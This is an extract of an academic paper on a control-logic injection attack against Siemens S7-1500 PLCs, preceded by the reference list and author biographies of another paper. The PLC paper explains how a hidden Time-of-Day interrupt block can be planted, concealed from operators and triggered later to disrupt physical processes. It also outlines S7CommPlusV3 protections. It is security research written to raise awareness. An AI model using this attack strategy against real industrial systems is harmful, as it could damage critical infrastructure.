[32] R. M. Freund, Introduction to semide nite programming (SDP), Dept. Electr. Eng. Comput. Sci., Massachusetts Inst. Technol., Cambridge, MA, USA, Rep., 2009. [Online]. Available:https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-251jintroduction-to-mathematical-programming-fall- 2009/readings/MIT6_251JF09_SDP.pdf [33] P. Bonami et al. , An algorithmic framework for convex mixed integer nonlinear programs, Discrete Optim. , vol. 5, no. 2, pp. 186 204, 2008. [34] L. Su, L. Tang, D. E. Bernal, and I. E. Grossmann, Improved quadratic cuts for convex mixed-integer nonlinear programs, Comput. Chem. Eng., vol. 109, pp. 77 95, Jan. 2018. [35] K. H. Johansson, The quadruple-tank process: A multivariable lab- oratory process with an adjustable zero, IEEE Trans. Control Syst. Technol. , vol. 8, no. 3, pp. 456 465, May 2000. [36] M. Ram, Ed., Sliding mode robust control approaches for robust control of quadruple tank system, Mathematics in Engineering Sciences: Novel Theories, Technologies, and Applications . Boca Raton, FL, USA: CRC Press, 2019. [37] G. Park, C. Lee, and H. Shim, On stealthiness of zero-dynamics attacks against uncertain nonlinear systems: A case study with quadruple-tank process, in Proc. Int. Symp. Math. Theory Netw. Syst. (ISMTNS) , 2018, pp. 10 17. [38] J. Lofberg, YALMIP : A toolbox for modeling and optimization in MATLAB, in Proc. IEEE Int. Conf. Robot. Autom. , Taipei, Taiwan, 2004, pp. 284 289. [39] RTI The Largest Software Framework Provider for Smart Machines and Real-World Systems. [Online]. Available: www.rti.com (accessed Sep. 22, 2020).[40] T. A. Youssef, M. El Hariri, A. T. Elsayed, and O. A. Mohammed, A DDS-based energy management framework for small microgridoperation and control, IEEE Trans. Ind. Informat. , vol. 14, no. 3, pp. 958 968, Mar. 2018. Jairo A. Giraldo (Member, IEEE) received the B.S. degree in electronic engineering from the National University of Colombia, Manizales, Colombia, in 2010, and the M.S. and Ph.D. degrees from the Universidad de los Andes, Bogota, Colombia, in 2012 and 2015, respectively. He is currently a Research Assistant Professor with the Department of Electrical and Computer Engineering, The University of Utah, Salt Lake City, UT, USA. His research interests include security and privacy in cyber physical systems, multiagent systems, and distributed control for smart grid. Mohamad El Hariri (Member, IEEE) received the Ph.D. degree in electrical and computer engineering from Florida International University, Miami, FL,USA, in 2018. He is currently an Assistant Professor of Renewable Energy Systems with the Electrical Engineering Department, Colorado School of Mines, Golden,CO, USA. His research interests include secure control and operation of criti-cal infrastructures, such as energy systems, transportation, and communication networks, as well as power system electronics, interconnection of renewable energy, and Internet of Things applications in smart grid. Masood Parvania (Senior Member, IEEE) received the Ph.D. degree in elec- trical engineering from Sharif University of Technology, Tehran, Iran, in2013. He is the Director of Utah Smart Energy Laboratory and an Associate Professor of Electrical and Computer Engineering with the University ofUtah, Salt Lake City, UT, USA. His research interests include the opera-tion, economics, and resilience of power and energy systems, and modeling and operation of interdependent critical infrastructures. Dr. Parvania serves as an Associate Editor of the IEEE T RANSACTIONS ONSMART GRID, the IEEE T RANSACTIONS ON POWER SYSTEMS ,a n dt h e IEEE T RANSACTIONS SUSTAINABLE ENERGY . He is the Chair of IEEE Power and Energy Society Utah Chapter, the IEEE PES Bulk Power SystemsOperation Subcommittee, and the IEEE PES Risk, Reliability, and ProbabilityApplications Subcommittee. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply.
A_New_Injection_Threat_on_S7-1500_PLCs_-_Disrupting_the_Physical_Process_Offline.pdf
Programmable Logic Controllers (PLCs) are increasingly connected and integrated into the Industrial Internet of Things (IIoT) for a better network connectivity and a more streamlined control process. But in fact, this brings also its security challenges and exposes them to various cyber-attacks targeting the physical process controlled by such devices. In this work, we investigate whether the newest S7 PLCs are vulnerable by design and can be exploited. In contrast to the typical control logic injection attacks existing in the research community, which require from adversaries to be online along the ongoing attack, this article introduces a new exploit strategy that aims at disrupting the physical process controlled by the infected PLC when adversaries are not connected neither to the target nor to its network at the point zero for the attack. Our exploit approach is comprised of two steps: 1) Patching the PLC with a malicious Time-of-Day interrupt block once an attacker gains access to an exposed PLC, 2) Triggering the interrupt at a later time on the attacker will, when he is disconnected to the system s network. For a real attack scenario, we implemented our attack approach on a Fischertechnik training system based on S7-1500 PLC using the latest version of S7CommPlus protocol. Our experimental results showed that we could keep the patched interrupt block in idle mode and hidden in the PLC memory for a long time without being revealed before being activated at the speci c date and time that the attacker de ned. Finally, we suggested some potential security recommendations to protect industrial environments from such a threat.
Received 6 December 2021; revised 22 January 2022; accepted 6 February 2022. Date of publication 14 February 2022; date of current version 2 March 2022. The review of this paper was arranged by Associate Editor Yang Shi. Digital Object Identi er 10.1109/OJIES.2022.3151528 A New Injection Threat on S7-1500 PLCs - Disrupting the Physical Process Of ine WAEL ALSABBAGH1,2(Member, IEEE), AND PETER LANGEND ERFER1,2 1IHP Leibniz-Institut f r innovative Mikroelektronik, 15236 Frankfurt (Oder), Germany 2Brandenburg University of Technology Cottbus-Senftenberg, 03046 Cottbus, Germany CORRESPONDING AUTHOR: WAEL ALSABBAGH (e-mail: [email protected]) This work was supported by the Open Access Fund of Leibniz Association. INDEX TERMS Programmable logic controllers, industrial control systems, injection attack, time-of-day block, of ine attack. I. INTRODUCTION Industrial Control Systems (ICSs) are used to automate critical control processes such as production lines, electrical power grids, oil and gas facilities, petrochemical plants, and others. Each ICS environment consists of two main sites: a control site and a eld site. Fig. 1 shows a typical ICS environment. The control center runs ICS services such as Human Machine Interfaces (HMIs) and engineering worksta- tions. The eld site has sensors, actuators, and Programmable Logic Controllers (PLCs) that are installed locally to monitor and control physical processes. The engineering workstation is used to con gure and program PLCs. It has a PLC vendor- speci c programming software to write control logic that de- nes how the PLC should control and maintain the physical process at a desired state. PLCs are offered by several vendorssuch as Siemens, Allen-Bradley, Mitsubishi, Schneider and Modicon. Each has its own proprietary rmware, program- ming language, communication protocols and maintenance software. In the past, when PLCs were rst introduced, it was un- common for them to be connected to the outer world and they were often running independently i.e., the PLC-based ICS environments were air-gapped. This separation is no longer possible due to new demands such as maximizing the pro ts, minimizing the costs, and achieving a better ef ciency [1]. Therefore, it is not surprising that most of modern ICS en- vironments are increasingly connected to corporate networks and no longer controlled/monitored on-site. Unfortunately, this higher connectivity has also enlarged the attack surface, and brought its security challenges allowing attacks that were This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see https://creativecommons.org/licenses/by/4.0/ 146 VOLUME 3, 2022 FIG. 1. An example of an industrial control system environment. not existing in the times of the air-gapped industrial plants. Stuxnet [12], which targeted the Iranian uranium enrichment in 2010, played an important role in increasing awareness of security for industrial control systems. This attack showed that no plant is resilient to cyber-attacks and that PLCs could be potentially hacked causing disastrous damages. But since then, several other ICS have been successfully attacked, for example the Ukrainian power grid [17], the German steel Mill [22], TRITON [16], etc. In this work, we show that modern PLC-based ICS envi- ronments are not fully protected against control logic injec- tion attacks, and that these systems are still quite far from being completely secure. To this end, we present a new at- tack strategy that allows malicious adversaries to disrupt the physical process controlled by PLCs of ine i.e., without being connected to the target or to its network at the point zero for the attack. The main focus of our investigations is on Siemens devices, precisely the latest PLC models i.e., devices from S7- 1500 family, and the latest version of S7CommPlus protocol i.e., S7CommPlusV3. Our attack approach is structured into two main phases: 1) Patching the control logic program of a PLC with an interrupt, precisely with Time-of-Day (ToD) interrupt block using the speci c Organization Block 10 (OB10). This is done online i.e., when the adversary has access to the target device. During this phase, the patch has no impact, neither on the physical process nor on the execution process of the control logic program i.e., the patch is in the idle mode. 2) Activating the patch injected in the target later at a certain date and time. This is done of ine i.e., withoutthe need of being connected to the target PLC at the point zero for the attack. To conduct experiments for proving the research, a Fis- chertechnik training industry plant1controlled by an S7-1500 PLC was used to test our attack approach. Our new threat is network based, and can be successfully conducted by any attacker with network access to any S7-1500 PLC with a rmware V2.9.2 or lower. A. MOTIVATION The objective of this article is to introduce a new control logic injection on cryptographically secured PLCs that use sophisticated protection methods. The intention of discussing this new type of attack is to raise awareness for sophisticated attacks and to assist in determining new vulnerabilities and weaknesses existing in PLCs as they are running in millions of critical industrial plants, and play a major point of in- teracting between the cyber and physical world. Our main focus is to understand the attack vectors in the rst place, and show the security research community, engineers, and industrial vendors what the consequence of the vulnerabilities would be if they are exploited. To conduct a real-world attack scenario, we chose a device from Siemens S7-1500 family. Our selection is based on two factors. First, Siemens is the leading provider of industrial automation components and their SIMATIC families have approximately 30-40% of the industry market [23] [25]. Secondly, Siemens claimed that its newest PLCs generation is well-secure against various attacks, 1https://www. schertechnikwebshop.com/de-DE/ schertechnik- lernfabrik-4-0-24v-komplettset-mit-sps-s7-1500-560840-de-de VOLUME 3, 2022 147 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE and their new developed S7CommPlus protocol supports im- proved security measures like an advanced anti-replay mech- anism and a sophisticated integrity check. These two factors motivated us to show how the most secure PLCs in Siemens SIMATIC lines can be exploited by external adversaries, and how attackers can confuse the physical process even without being connected to the victim devices. This could lead to dis- astrous damages to the plants employing such compromised devices. The major bene t of our attack strategy is that, the time running the attack and the point in time, when it shall hit the victim can be fully decoupled. For example, if motivated adversaries want to collapse a certain system at a speci c date/time e.g., the day before elections, or the day before going to the stock market to harm a country or a company respectively, they have suf cient time to inject their malicious code very well in advance, and do not need to be successful with the attack just at the right time. B. PROBLEM STATEMENT Most of the injection attacks have two critical challenges: First is that the typical injection attacks are designed to gain access to the target or its network in very speci c circumstances i.e., when the security measure implemented is absent or disabled for a certain reason [2], [3], [5] [7], [9] [11], [13], [18], [29], [30], [34] for example, the security mean is being updated, the ICS operator is running some maintenance processes, other devices are being removed/replaced/added to the network, etc. The system is at high risk to get a malicious infection during these critical phases, but it is not operating in its normal state i.e., the physical process is more likely to be temporally off. Hence, if attackers manage successfully to gain access to the target device during these times, and perform their attacks right after that, they will, pretty likely, not impact the physical process. The second challenge is that after the ICS operator is done with the ongoing maintenance processes, he usually reactivates the security measure before re-operating the sys- tem once again. This allows him to reveal and prevent any attempt to inject the PLC if the attacker is still connected to the network. Our attack approach overcomes both challenges by patching the PLC with a malicious block at that point in time at which the attacker accesses the network success- fully, keeping the infection hidden in the PLC s memory, and lunching the attack at a later time on his will. This ensures that the attack is not being performed when the system is not operating normally or being detected by an introduced or reactivated security measure. It is also important to highlight that ICS operators are still able to reveal any infection or modi cation in the control logic program, by uploading and comparing both programs the one running on the PLC and the one running in the engineering software [10]. In this article, we also overcome this challenge by exploiting a vulnerability existing in the newest S7CommPlus protocol (explained in Section V) to hide the infection from the ICS operator i.e., who will always be shown the original code that runs on his engineering software whilst the PLC runs the attacker s code.C. ATTACKER MODEL Assumption: Our attacker model assumes that an attacker has access to the level-3 network of the Purdue Model2(i.e., control center network). This assumption is based on real- world ICS attacks e.g., TRITON [16] and Ukraine power grid attack [17] that gained access to the control center via a typical IT attack vector such as infected USB stick and social engineering attack. We also assume that the attacker has access to the PLC and its respective engineering software along with a packet-snif ng tool such as Wireshark.3After the level-3 network access, an attacker can make use of software and libraries to communicate with the target PLC over the network. As our assumptions have already been reported to hold true in reports on real world attacks, we are convinced that our attack is a realistic one. Attacker s goal: The attacker s goal is as follows: disrupting the physical process at a time when he is completely of ine, i.e., without being connected to the target or its network at the point zero for the attack, while the physical process of the target network is controlled by the infected PLC. In order to ensure achieving the overall goal, the injection may not be revealed by the ICS operator in the time between infecting the PLC and the attack launch date. In this work, we assume that an attacker achieves these goals if the following three tasks are accomplished: 1) patching the malicious code when the attacker is con- nected to the target s network. 2) keeping this infection hidden in the PLC s memory without being revealed. 3) disrupting the physical process at a later time when the attacker is completely of ine of the target s network. Attacker s capabilities: The attacker can employ one or more of these capabilities to achieve the goals mentioned earlier: 1) Eavesdropping: read any messages between two com- municating parties. 2) Fabrication: initiate conversation with any other party and compose/send a new message. 3) Interception: intercept messages, and block or mod- ify/resend them. D. CONTRIBUTIONS In this article, we take the attack approach presented in our former paper [10] one step further in the direction of ex- ploiting PLCs of ine, and extend our experiences to involve the modern S7-1500 PLCs that use S7CommPlusV3 protocol. Our main contributions in this article are summarized as fol- lows: 1) Extending our control logic injection attack approach presented in [10] from S7-300 to S7-1500 PLCs. 2) Hiding the malicious interrupt code in the PLC s mem- ory until the very moment determined by the attacker. 2https://www.goingstealthy.com/the-ics-prude-model/ 3https://www.wireshark.org/ 148 VOLUME 3, 2022 3) Disrupting the physical process controlled by the com- promised PLC of ine i.e., when the attacker is not con- nected to the target or its network. 4) Demonstrating our attack using a real Siemens S7- 1512SP controlling a Fischertechnik training factory. 5) Revealing two new vulnerabilities in the integrity protection method that S7-1500 PLCs and their S7CommPlus protocol use. The rest of this work is organized as follows. Section II provides an overview of control logic injection attacks and related work. Section III presents the technical background, followed by the description of the protection mechanism of the latest S7CommPlus protocol in Section IV. Our attack approach is presented and explained in details in Section V. In Section VI, we evaluate and discuss the impact of our attack, as well as suggest some possible mitigation methods. Finally, we conclude our work in Section VII. II. OVERVIEW AND RELATED WORK One of the recent threats targeting ICSs is the control logic in- jection attack. Such an attack involves modifying the original control logic running on a target PLC by engaging its engi- neering software, typically employing the man-in-the-middle approach [3] [5], [9], [10], [13], [30] [32]. The main vulnera- bility exploited in this type of attacks is the lack of authentica- tion measures in the PLC protocols. ICS vendors responded to this threat by providing their PLCs with passwords to protect the control logic from unauthorized access i.e., whenever an ICS supervisor attempts to access the control logic running in a PLC, the device rst requires an authentication to allow him to read/write the code. This is normally done via propri- etary authentication protocol. But, this solution is not fully preventing the controllers from being compromised. Previous academic efforts [2] [5], [9], [35] managed successfully to bypass the authentication and to access the control logic in different password-protected PLCs. The authors of the above- mentioned papers discussed two prime ways to bypass the authentication: either by extracting the hash of the password and then pushing it back to the PLC (known as a replay attack), or using a representative list of plain-text password, encoded-text password pairs to brute-force each byte of ine. Overall, protecting the control logic by password authenti- cation only failed. Attackers are still capable of accessing the PLCs program and manipulating the physical processes controlled by the exposed devices. In the research community there are two types of control logic injection attacks: traditional control logic injection and rmware injection. However, infecting a PLC rmware would be a challenging task in a real ICS environment as most PLC vendors protect their PLCs from unauthorized rmware updates by cryptographic methods e.g., digital signature, or allowing rmware updates only by local access (e.g., SD cards and USB). This work does not cover a rmware injection and only focuses on the traditional control logic injection attack. In the following, we classify the existing injection attacks aiming at disrupting the physical process into two groups. FIG. 2. Disrupting the physical process online. A. DISRUPTING THE PHYSICAL PROCESS ONLINE The attacks in this group are designed to modify the original control logic program by engaging its engineering software. The physical process controlled by the infected device is im- pacted right after the malicious code is successfully injected. Fig. 2 shows the attack sequence. The most well-known attack representing this kind is the one that was conducted on Iranian nuclear facilities in 2010, named as Stuxnet to sabotage centrifuges at a uranium enrich- ment plant. The Stuxnet attack [12], [20], [21] used a windows PC to target Siemens S7-300 and S7-400 PLCs that were con- nected to variable frequency drives. It infects the control logic of the PLCs to monitor the frequency of the attached motors, and launches an attack if the frequency is within a certain range (i.e., 807 Hz and 1,210 Hz). More recent examples of such attacks on ICS occurred in Ukraine [17], [19]. These attacks targeted the electrical distribution grid causing wide- spread blackouts. In 2014, the German federal of ce for infor- mation security also announced a cyber-attack at an unnamed steel mill [22]. The hackers manipulated and disrupted control systems to such a degree that a blast furnace could not be properly shot down, resulting in a massive damage. McLaugh- lin [45] conducted a control logic injection attack on a train interlocking program. The malicious program he introduced was reverse engineered using a format program. With the help of the decompiled program, he extracted the eld-bus ID that indicated the PLC vendor and model, and then retrieved clues about the process structure and operations. Afterwards he designed his own program that generates unsafe behaviors for the train e.g., causing con ict states for the train signals. As a real attack scenario, he targeted timing-sensitive signals and switches. In a follow up work, McLaughlin et al. [46] implemented SABOT. It required a high-level description of the physical process, for example, the plant contains two in- gredient valves and one drain valve . Such information could be got from public channels, and are similar for processes in the same industrial sector. With this information, SABOT generates a behavioral speci cation for the physical processes and used incremental model checking to search for a mapping between a variable within the program, and a speci ed physi- cal process. Using this map, SABOT compiled a dynamic pay- load customized for the physical process. Both studies were limited to Siemens PLCs, without illustrating many details on reverse engineering. Valentine [48] introduced attacks that could install a jump to a subroutine command, and modify the interaction between two or more ladders in a program. This could be disguised as an erroneous use of scope and linkage by a novice programmer. In 2015, Klick et al. [6] VOLUME 3, 2022 149 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE presented the injection of malware into the control logic of a SIMATIC PLC, without disrupting the service. The authors showed that a knowledgeable adversary with access to a PLC can download and upload code to it, as long as the code consists of MC7 bytecode. In a follow on work, Spenneberg et al. [7] introduced a PLC worm. The worm spreads inter- nally from one PLC to other target PLCs. During the infection phase, the worm scans the network for new target PLCs. A Ladder Logic Bomb malware written in ladder logic or one of the compatible languages was introduced in [8]. Such a malware is inserted by an attacker into existing control logic on PLCs. A group of researchers [9] demonstrated a remote attack on the control logic of PLCs. They were able to infect the PLC and to hide the infection from the engineering soft- ware at the control center. They implemented their attack on Schneider Electric Modicon M221, and its vendor-supplied engineering software SoMachine-Basic. Senthivel et al. [18] presented three control logic injection attacks where an at- tacker interferes with engineering operations of downloading and uploading PLC control logic. In the rst attack scenario, an attacker, placed in a man-in-the-middle position between a target PLC and its engineering software, injects malicious control logic to the PLC and replaces it with original control logic to deceive the engineering software when the uploading operation is requested. The second scenario that their paper presented is very similar to the rst scenario but differs in that an attacker uploads malformed control logic instead of the original control logic to crash the engineering software. The last scenario does not require a man-in-the-middle position, as the attack just injects crafted malformed control logic to the target PLC. Lei et al. [31] demonstrated a spear that can break the security wall of the S7CommPlus protocol that Siemens SIMATIC S7-1200 PLCs utilize. The authors rst used the Wireshark software to analyze the communications between the TIA Portal software and S7 PLCs. Then, they applied the reverse debugging software WinDbg4to break the encryption mechanism of the S7CommPlus protocol. Afterwards, they demonstrated two attacks. First a replay attack was performed to start and stop the PLC remotely. In the second attack sce- nario, the authors manipulated the input and output values of the victim causing a serious damage for the physical process controlled by the infected PLC. In 2021, researchers in [3] also showed that S7-300 PLCs are vulnerable to such attacks and demonstrated that exploiting the control logic running in a PLC is feasible. After they compromised the security mea- sures of PLCs, they conducted a successful injection attack and kept their attack hidden from the engineering software by engaging a fake PLC impersonating the real infected de- vice. Researches behind Rogue7 [30] were able to create a rogue engineering station which can masquerade as the TIA Portal to S7 PLCs, and to inject any messages favorable to the attacker. By understanding how cryptographic messages were exchanged, they managed to hide the code in the user memory, which is invisible to the TIA Portal engineering 4http://www.windbg.org/ FIG. 3. Disrupting the physical process of ine. station. In [44], a group of security researchers analyzed the anti-replay mechanism that the new S7 PLCs used, and man- aged successfully to steal an existing communication session and to make unauthorized changes to the PLC states. As a part of their experiments, they identi ed speci c bytes necessary to craft valid network packets, and demonstrated a successful replay attack on S7 PLCs. All the attacks mentioned above are limited and require that attackers are connected to the target at the point zero for the attack, which increases the possibility of being revealed by the ICS operators beforehand, or detected by security measures. B. DISRUPTING THE PHYSICAL PROCESS OFFLINE The attacks in this class are quite similar to the ones men- tioned in the prior class, but differs in that an adversary does not aim at attacking the physical process right after gaining access to the target device. Meaning that, he patches his ma- licious code once he accesses an exposed PLC, then closes any live connection with the target keeping his patch inside the PLC s memory in idle mode. Afterwards, he activates his patch and compromises the physical process at a later time he wishes even without being connected to the system network (see Fig. 3). To the best of our knowledge, only a few academic ef- forts discussing this new threat were published. Serhane et al. [47] focused on Ladder logic code vulnerabilities and bad code practices that may become the root cause of bugs and subsequently be exploited by attackers. They showed that attackers could generate uncertainly uctuating output vari- ables e.g., performing two timers to control the same output values could lead to a race condition. Such a scenario could result in a serious damage to the devices controlled, similar to Stuxnet [12]. Another scenario that the authors pointed out is that skilled adversaries could also bypass some functions, manually set certain operands to desired values, and apply empty branches or jumps. In order to achieve a stealthy modi- cation, attackers could use array instructions or user-de ned instructions, to log insert critical parameters and values. They also discussed that attackers could apply an in nite loop via jumps, and use nest timers and jumps to only trigger the attack at a certain time. We, in our former paper [10], presented a novel approach based on injecting the target PLC with a 150 VOLUME 3, 2022 FIG. 4. A typical S7 PLC Architecture. Time-Of-Day interrupt code, which interrupts the execution sequence of the control logic at the time the attacker sets. Our evaluation results proved that an attacker could confuse the physical process even being disconnected from the target system. Although our research work was only tested on an old S7-300 PLC, and was just aiming at forcing the PLC to turn into stop mode, the attack was successful and managed to interrupt executing the original control logic code running in the patched PLC. Such attacks are severer than the online ones as the PLC keeps executing the original control logic correctly without being disrupted for hours, days, weeks, months and even years until the very moment determined by the attacker. The only realistic way to reveal this kind of attack is that the ICS operator requests the program from the PLC and compares the online code running in the infected device with the of ine code that he has on the engineering station. But in this work, we overcome this challenge as illustrated later in Section V. III. TECHNICAL BACKGROUND In this section, we outline the architecture of a standard S7 PLC and its operating system, engineering software, user pro- gram, Time-of-Day interrupt, and S7Communication proto- cols. A. SIMATIC S7 PLC ARCHITECTURE Siemens produces several PLC product lines in the SIMATIC S7 family e.g., S7-300, S7-400, S7-1200, and S7-1500. All have the same architecture. Fig. 4 depicts a standard archi- tecture of an S7 PLC that includes input and output modules, power supply, and memory such as Random Access Mem- ory (RAM) and Electrically Erasable Programmable Read- only Memory (EEPROM). The rmware, known as Operating System (OS), as well as the user-speci c program is stored in the EEPROM. Input and Output devices such as sensors, switches, relays, and valves are connected with the input and output modules. The PLC is connected to a physical process; the input devices provide the current state of the process to FIG. 5. Overview of program execution, extracted from [43]. the PLC, which the PLC processes through its control logic, and controls the physical process accordingly via the output devices. The control logic that an S7 PLC runs is programmed and compiled into a lower representation of the code i.e., to MC7 or MC7+ bytecode for S7-300/S7-400 or S7-1200/S7- 1500 PLCs respectively. After the code being compiled by the engi- neering station, its blocks, in MC7/MC7+ format, are down- loaded and installed into the PLC via Siemens S7Comm or s7CommPlus protocol for S7-300/S7-400 or S7-1200/S71500 PLCs respectively. Then, the MC7/MC7+ virtual machine in the S7 PLC will dispatch the code blocks, interpret and exe- cute the bytecode. B. OPERATING SYSTEM (OS) Siemens PLCs run a real time OS, which initiates the cycle time monitoring. Afterwards, the OS cycles through four steps as shown in Fig. 5. In the rst step, the CPU copies the values of the process image of outputs to the output modules. In the second step, the CPU reads the status of the input modules and updates the process image of input values. In the third step, the user program is executed in time slices with a duration of 1 ms (ms). Each time slice is divided into three parts, which are executed sequentially: The operating system, the user program and the communication. The number of time slices depends on the complexity of the current user program and the events interrupting the execution of the program. In normal operation, if an event occurs, the block currently being executed is interrupted at a command boundary and a different organization block that is assigned to the particular event is called. Once the new organization block has been executed, the cyclic program resumes at the point at which it was interrupted. This holds true as the maximum allowed cycle time (150 ms by default) is not exceeded. In other words, if there are too many interrupt OBs called in the main OB1, the entire cycle time might be extended more than it is set in the PLC hardware con guration. Exceeding the maximum allowed execution cycle generates a software error, and the PLC calls a speci c block to handle this error i.e., OB80. VOLUME 3, 2022 151 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 6. S7 PLC s user program blocks. There are two ways to handle with this error: 1) PLC turns to a stop mode if the OB80 is not loaded in the main program, 2) PLC executes the instructions that OB80 is programmed with e.g., an alarm. C. ENGINEERING SOFTWARE Siemens provides their Total Integrated Automation (TIA) Portal software to engineers for developing PLC programs. It consists of two main components. The STEP 7 as develop- ment environment for PLCs and WinCC to con gure Human Machine Interfaces (HMIs). Engineers are able to program PLCs in one of the following programming languages: Ladder Diagram (LAD), Function Block Diagrams (FBD), Structured Control Language (SCL), and Statement List (STL). D. USER PROGRAM S7 PLC programs are divided into the following units: Or- ganization Blocks (OBs), Functions (FCs), Function Blocks (FBs), Data Blocks (DBs), System Functions (SFCs), System Function Blocks (SFBs) and System Data Blocks (SDBs) as shown in Fig. 6. OBs, FCs and FBs contain the actual code, while DBs pro- vide storage for data structures, and SDBs for the current PLC con gurations. The pre x M, memory, is used for addressing the internal data storage. A simple PLC program consists of at least one organization block called OB1, which is comparable to the main () function in a traditional C program. In more complex programs, engineers can encapsulate code by using functions and function blocks. The only difference is an ad- ditional DB as a parameter for calling an FB. The SFCs and SFBs are built into the PLC. However, the operating system calls OB cyclically and with this call it starts cyclic execution of the user program. E. TIME-OF-DAY (TOD) INTERRUPTS ATime-of-Day (TOD) interrupt is executed at a con gured time, either one-time or periodically depending on the needs of interrupt e.g., every minute, hourly, daily, monthly, yearly, and at the end of the month. A CPU 1500 provides 20 organi- zation blocks with the numbers OB10 to 0B17 and after OB 123 for processing a TOD interrupt. To start a TOD interrupt, a user must rst set the start time and then activate the interrupt. He can carry out both activitiesseparately in the block properties, automatic con guration, or also with system functions, manual con guration. Activating the block properties means that the Time-of-Day interrupt is automatically started. However, in the following we illustrate both ways brie y: 1)Automatic con guration: The user adds an organization block with the event class Time-of-Day and enters the name, programming language, and number. He programs the OB10 with the required instructions to be executed when the inter- rupt occurs. 2)Manual con guration: In this method, the user uses sys- tem function blocks to set, cancel, and activate a Time-of-Day interrupt. He sets the necessary parameters for the interrupt in the main OB1, by using system function blocks while the interrupt instructions to be executed are programmed in OB10. [49] provides technical details to set and program Time-of-Day interrupts in S7-1500 PLCs. F. S7COMMUNICATION PROTOCOLS The S7 protocol de nes an appropriate format for exchanging S7 messages between devices. Its main communication mode follows a client-server pattern: the HMI or TIA Portal device (client) initiates transactions and the PLC (server) responds by supplying the requested data to the client, or by taking the action requested in the instruction. Siemens provides its PLCs with two different protocol avors: the older SIMATIC S7 PLCs implement an S7 avor that is identi ed by the protocol number 0x32 (S7comm), while the new generation PLCs im- plement an S7 avor that is identi ed by the protocol number 0x72 (S7CommPlus). The newer S7CommPlus protocol has three sub-versions: S7CommPlusV1, S7CommPlusV2, and S7CommPlusV3. In this article, we only focus on the S7CommPlusV3 Pro- tocol that is used in the newer versions of the TIA Portal from V13 on, and in the newer PLC S7-1500 rmware e.g., V1.8, 2.0, etc. This protocol requires that both the TIA Por- tal and the PLC support its features, and has more complex integrity protection mechanisms as illustrated in the next sec- tion. S7CommPlusV3 protocol is considered as the most se- cure protocol compared to the older S7CommPlus versions, i.e., S7CommPlusV1 and S7CommPlusV2. IV. S7COMMPLUSV3 PROTOCOL The S7CommPlusV3 protocol is used only by the newer ver- sion of the TIA Portal, and the S7-1500 PLCs. It supports var- ious operations that are performed by the TIA Portal software as follows: 1) Start/Stop the control program currently loaded in the PLC memory. 2) Download a control program to the PLC. 3) Upload the current control program from the PLC to the TIA Portal. 4) Read the value of a control variable. 5) Modify the value of a control variable. The above-mentioned operations are translated by the TIA Portal software to S7CommPlus messages before they are 152 VOLUME 3, 2022 FIG. 7. The S7 Session Key Establishment Mechanism. transmitted to the PLC. The PLC acts then on the messages it receives, executes the control operations, and responds back to the TIA Portal accordingly. The messages are transmitted in the context of a session, each session has a session ID chosen by the PLC. A session begins with a four-message handshake used to select the cryptographic attributes of the session in- cluding the protocol version and keys. After the handshake, all messages are integrity protected using a cryptographic protection mechanism as illustrated in the next subsection. A. THE S7 INTEGRITY PROTECTION MECHANISM Siemens integrated cryptographic protection in its newer S7 proprietary protocol in order to protect its PLCs from unau- thorized access. The new mechanism uses two main modules: 1)A session key exchange protocol that the two parties (PLC and TIA Portal) use to establish a secret shared key in each session. 2)Per-fragment message protection that calculates a Message Authentication Code (MAC) value. 1) S7 KEY EXCHANGE PROTECTION Siemens improved its S7CommPlus protocol by replacing the key generation process in the prior version, i.e., the S7CommPlusV2, by a more complex process in the newer version S7CommPlusV3. The new mechanism involves a new key exchange technique, that uses elliptic-curve public-key cryptography [33] as depicted in Fig. 7. FIG. 8. The Structure of the SecurityKeyEncriptedKey BLOB Data. The rst request message is a Hello message that the TIA Portal sends to initialize a new session. Then, the PLC re- sponds back with sharing its rmware version, model, Session ID, and speci c 20-bytes known as PLC_Challenge . The PLC rmware version determines the elliptic-curve public-key pair to be used in the key exchange. After the TIA Portal receives the second message from the PLC, it activates a derivation algorithm to randomly select a key Derivation Key (KDK ), and to generate the session key from the PLC_Challenge and the selected KDK . Afterwards, the TIA Portal transmits the key encrypted using Elliptic-Curve Cryptography (ECC) to the PLC over the third message. The third message contains, among other things, two main parts: a) A data structure called SecurityKeyEncryptedKey shown in Fig. 8, which contains the selected key encrypted with the PLC s public key. b) Two 8-bytes key ngerprints (additional key), of the PLC public key ID and the selected key, respectively. Finally, the PLC veri es the third message. If this is done successfully, it returns OK in the fourth message, and from this point on, all the following messages in the session are integrity protected with the derived Session Key. 2) PER-FRAGMENTATION MESSAGE PROTECTION When the TIA Portal downloads/uploads the control logic program to/from an S7-1500 PLC, the assigned S7CommPlus messages are fragmented to many small fragments sent over the TCP/IP packets. All messages exchanged between the two parties are integrity protected HMAC-SHA256 [27]. This integrity protection is applied at the fragment level. Meaning that, it replaces the signal MAC value at the end of each message, and a cryptographic digest is placed at each frag- ment between the fragment header and the fragment data as shown in Fig. 9. [27] presents more technical details about this protection mechanism. Although fragmenting the S7 messages was more chal- lenging for attackers, they eventually overcame this protec- tion mechanism and compromised the PLCs using this tech- nique. The vulnerability reported in [28] shows that attackers VOLUME 3, 2022 153 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 9. S7CommPlus message with integrity protection at fragment level. could implement man-in-the-middle approach and managed successfully to modify the network traf c exchanged on port 102/TCP due to the certain properties in the calculation used for this integrity protection. B. S7COMMPLUS DOWNLOAD MESSAGES - OBJECTS AND ATTRIBUTES S7 is a request response protocol. Each request message con- sists of a request header, and a request set. The header con- tains a function code, which identi es the requested operation e.g., 0x31 for a download message (see Fig. 9). A single S7CommPlus message might contain multiple objects, each containing multiple attributes. All objects and attributes have unique class identi ers. However, the CreateObject request builds a new object in the PLC memory with a unique ID (in our example, 0x04ca ). The program download message then creates an object of the class ProgramCycleOB . This object contains multiple attributes, each one having values dedicated 